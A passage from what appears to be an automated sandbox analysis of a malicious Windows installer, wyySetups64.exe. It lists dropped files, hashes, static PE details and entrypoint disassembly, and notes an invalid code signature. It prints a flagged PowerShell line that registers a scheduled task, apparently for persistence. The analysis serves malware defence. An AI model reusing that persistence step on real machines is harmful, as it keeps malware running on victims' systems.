                                                                                                                                                                                                            SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~].:<..:<..:<...s7.<<..3D4..<..3D(.7<......2<..$n%.?<..:<...>......%<......;<..3D"..<..3D%..<..3D3.;<..$n5.;<..:<6.;<..3D0.;<..Rich:<..........................PE..L...0..\...........!.....@...$.......E.......P............................................@.................................<].......`..H-...........4..h7...........X..............................8...@............P..,............................text...f?.......@.................. ..`.rdata...=...P...>...D..............@..@.data...............................@....rsrc...H-...`......................@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\NewInstallAir\NewInstallAir.ui

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1135682
                                                                                                                                                                                                            Entropy (8bit):7.510976265913228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
                                                                                                                                                                                                            MD5:44C8DF596B52856EB1D3FE2E37CBDE4D
                                                                                                                                                                                                            SHA1:4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
                                                                                                                                                                                                            SHA-256:ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
                                                                                                                                                                                                            SHA-512:EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK...........Q................DPI_240_Images/PK........0PZU....%...%.......DPI_240_Images/bg_promote.png.PNG........IHDR.............\$......PLTE............U.wh......^.tz..........Ita0bL.?#.?$.A$.G'.P-.S..U0.W0.X1.Y2.Z2.[3.\3.^4._6.a6.d7.g9.j;.m<.o>.q@.tA.vB.yC.|E..G..I..J..K..L..M..N..O..Q..Q..S.pI.tK.xL.uJ.wJ.yK.zL.|M.}N..O..M..O.}L.{J.zJ.tH.vI.yJ.|L.}MD.@..=..?..A..E.G.A.H.-.dG.{[..9.n'.^8.f).Z"{R..O..Q..R..T..W..Y..\".^#.a&.d(.g*.k..o...............3&.5'.6(.9*.=).9(.9%.<&.=".9..5..1..-..&.....R3.W5.R3.Z6.\9._;.a=.c>.e?.f@.hA.jB.lC.nE.pE.rF.tG.uG.wH(.;<..._C.dD.iF.lJ.qL.uN.xO.|Q..R..T..V..X..U..R..P..L..K..V..X..Z..[..].._..a.h@.d;.k?.pB.uEq.........>jW(U?.F/.R>.VA.ZB.\E.`F.dG.fI.iJ.egF..%.........}.*...b...........<.~;.|9.z7.x5.w3.u1.r...U.....k.!mI+sQ...8}\...G.i......q.]R..E.&<.,4.1,.5%.9..D..J..L..L..Y.|........X.E...T.j.....a.2.^..F..1..............`..A..,..W....y0&$.....IDATx......A..P:@.A......K...$.qwx.T...[...>`...D.oW.'u...?..qy...t...,S.Y..<. M

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\theme_NewInstallAir.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28030
                                                                                                                                                                                                            Entropy (8bit):3.581114835224513
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
                                                                                                                                                                                                            MD5:8074E9740A0E3CFDA172AD1983C72A05
                                                                                                                                                                                                            SHA1:B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
                                                                                                                                                                                                            SHA-256:E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
                                                                                                                                                                                                            SHA-512:F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{D699128A-3414-4fdc-A2BD-B3D2CDE19B93}.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14344
                                                                                                                                                                                                            Entropy (8bit):7.934027356242661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                                                            MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                                                            SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                                                            SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                                                            SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR...\...|.....-..)...>PLTE..q..q..s....v....x..!.1.+.+.%...|..q..r!.u$.v..t..s..t..r&.v..w+.x....z..'.x..}../.y......w..z5.{..t*.{..9.}..(.~..}#.|..".#.%.*.....~>.). ...|&.1.}....{+.!.y0.B.~F.*.=..B.6.zG.6.3.C.}:.2.~R.-.'.|B..L.K.O.=.|#.yF.".R..N.X.I.._./.xZ.,.wI..1.T.5.?...X..M..H=.w.bY.j..V*u.7....tRNS..e..e.e......2....6kIDATx...k..@..`...~.P.(j.b.%...W..EX.A.,........{.7.I3Y5......D}...i...8..`..~...W.En^8.jr..+....k... w.9.s....r....\.{-./].r.Q9...9.X.O&O..~........z]&...D.T..<|..e)/^.....X..p....|..Jd!.....7o..,...WX.....rV.../...Wo.{...K.2.U.G....4H.......y9d..q!=..i\.t5....",.r.....G.r....&.*...lI.<....z\N.<L./.k*.....B...k.U\./.t......../.7...U.+(]#.@R...V.q.g.&I.i.-d...v..-.2..a.W..LY.jl.,.B_..i..y..B....Y....K....+,]...,,..6......?..l..:#.xg.-..[o...m.WH+......E\.e|....K./...Z1]J.f.vq.Z.......u...+........[O..._..-^..E^r0.{.l.+O.FK........^...3..|]z\u.......b...VW..R.n..@...*w.q

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):704608
                                                                                                                                                                                                            Entropy (8bit):6.625840358726942
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                                                            MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                                                            SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                                                            SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                                                            SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...nl..nl..nl..I..ol...s..fl..p>'.kl...#5.kl..g.6.Ol..g.*.el..I..ql..nl...m..g. ..l..g.'..l..g.1.ol..p>7.ol..nl4.ll..g.2.ol..Richnl..................PE..L......Z...........!......................................................................@..............................................................5......LS...................................................................................text............................... ..`.rdata..w...........................@..@.data...`........4..................@....rsrc...............................@..@.reloc..`p.......r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\updated.ps1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):151
                                                                                                                                                                                                            Entropy (8bit):4.741657013789009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                                                                                                            MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                                                                                                            SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                                                                                                            SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                                                                                                            SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\wyySetups64.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3213672
                                                                                                                                                                                                            Entropy (8bit):6.451509628158769
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:xWutLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:HtLutqgwh4NYxtJpkxhGU333X
                                                                                                                                                                                                            MD5:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            SHA1:C3500A1E6DB48E87C2BA73BBB5CCC23EC31BBC2C
                                                                                                                                                                                                            SHA-256:E70179810F8C851E20966DA1E5E1BB45DFC603C068864192C43EB161CE7ABBD9
                                                                                                                                                                                                            SHA-512:BE792992521A9A618683C4CE3D55B984C607A8478A9889C38D87603B3CCF239E8715B005CB9D4CC7447B47DDE7740AC47971CBA0426B8F064F15D59DF035A632
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1.......1...@......@....................-.......-..9....................0.h-...........................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\wyySetups64.exe:Zone.Identifier

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                            C:\Users\user\Downloads\360instpatch.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):4118496
                                                                                                                                                                                                            Entropy (8bit):7.743814085153487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                            MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                            SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                            SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                            \Device\Mup\localhost\pipe\atsvc

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4713
                                                                                                                                                                                                            Entropy (8bit):7.794126798189374
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:PXjz1tPmFxslSjesx2hbOW3Pp58i3uzodO38KYBZJI1nVq:PXjLPma2wFqeO33iJI1nVq
                                                                                                                                                                                                            MD5:2F4F4B30A5B098DE11AA26B6BDFF2ECC
                                                                                                                                                                                                            SHA1:4F2C267C7CEC2BB3B51DB53766B81FBEDD9DA615
                                                                                                                                                                                                            SHA-256:EDD1D1E873D4D9AFC4D0D60935F231AD65262D82DFBCBC15BCC89DC85ECD6E92
                                                                                                                                                                                                            SHA-512:07804C833ED0E175CCD6C239080974841C0864B46B36F40DDCF803EB814F4358FDD56216A98DA9ED548834A8D0FB30E5CD70BE94B4A0AB6583B7E7E76A340B80
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....;..[/..@..P...................P...........a..8..f.]~.....Q.I.V.....g..@Ld....C..{1E.[.|G]........:...T9$\.`...cZ..Y.................z.....................d........i..bAUS..B.a...7eq.v..E........D..{i...9....T.^#F..<.f.&T.}.f2...@.~.yl...>.^..........c^.:..z.,.J.....}_.X.3......."...%.#.....!.L.8+}dcO..$Nk..k0E.....Pbq..2j...9t.(.L.....S.~......a.........q.4...^.........._...Q..R.,...HX,.b0...]*..._.[wM..A..%..M...G..* Rg. .,..?d..]..8'..#.O.7|..&W.9[..b..z...&.s6.....].r..S.z;&.A...I.....Z. .6.t@..q.I...?...:... .Z;....Q......O..4..y5O(.P%.m.[.>....#..H.#..>#...w...C.*....j.........$:`.8\.'0g....H._N=........{.t].-.o.8}.9M.Mv...T....6.]...Z.....d....>n5To_..h....*.a......D..d..

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.451509628158769
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:wyySetups64.exe
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5:97090426a42466d139d3e45f47c652f8
                                                                                                                                                                                                            SHA1:c3500a1e6db48e87c2ba73bbb5ccc23ec31bbc2c
                                                                                                                                                                                                            SHA256:e70179810f8c851e20966da1e5e1bb45dfc603c068864192c43eb161ce7abbd9
                                                                                                                                                                                                            SHA512:be792992521a9a618683c4ce3d55b984c607a8478a9889c38d87603b3ccf239e8715b005cb9d4cc7447b47dde7740ac47971cba0426b8f064f15d59df035a632
                                                                                                                                                                                                            SSDEEP:49152:xWutLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:HtLutqgwh4NYxtJpkxhGU333X
                                                                                                                                                                                                            TLSH:EBE54A27F28C713ED06B3A324A3386909837F66179168C6797FC794C8F365942A3E647
                                                                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:0c1733515131060c

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x6c6668
                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x63ECF219 [Wed Feb 15 14:54:17 2023 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                            Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8

                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                            • 06/05/2023 01:00:00 06/05/2026 00:59:59
                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                            • CN=Johannes Schindelin, O=Johannes Schindelin, S=Nordrhein-Westfalen, C=DE
                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                            Thumbprint MD5:0BDACC0E75B258864C6FFA046FF1F84A
                                                                                                                                                                                                            Thumbprint SHA-1:3EB14A3AEF84B7153E139397F0A49E2FAC662B0E
                                                                                                                                                                                                            Thumbprint SHA-256:637C86766A7FB03A8AF3B6D18E2F1183594BD60A75AFC1C36BA9AF46CE2A5A36
                                                                                                                                                                                                            Serial:7D467C5AC99420F6A7E2A89ED61472B4

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov eax, 006BABB4h
                                                                                                                                                                                                            call 00007F976059AEA2h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov eax, dword ptr [eax+00000188h]
                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F976059F23Dh
                                                                                                                                                                                                            mov edx, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov edx, dword ptr [edx]
                                                                                                                                                                                                            mov edx, dword ptr [edx+00000188h]
                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call 00007F976059F229h
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 006C66F9h
                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                            call 00007F976059E584h
                                                                                                                                                                                                            call 00007F9760844BCBh
                                                                                                                                                                                                            mov eax, dword ptr [006BA7DCh]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push 006BA874h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            call 00007F97607429F0h
                                                                                                                                                                                                            mov eax, 006B5454h
                                                                                                                                                                                                            mov edx, dword ptr [006CFDB4h]
                                                                                                                                                                                                            mov dword ptr [edx], eax
                                                                                                                                                                                                            call 00007F9760844C12h
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                            jmp 00007F976085098Bh
                                                                                                                                                                                                            jmp 00007F97605937A7h
                                                                                                                                                                                                            call 00007F976084495Ah
                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                            call 00007F9760594290h
                                                                                                                                                                                                            call 00007F9760593BEBh
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov edx, 006C688Ch
                                                                                                                                                                                                            call 00007F97607424BAh
                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov eax, dword ptr [eax+00000188h]

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x2de0000x97.edata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2d90000x39ba.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e10000x3ad00.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x30dc000x2d68.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x2e00000x18.rdata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2d99f00x8c4.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2dd0000xbde.didata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

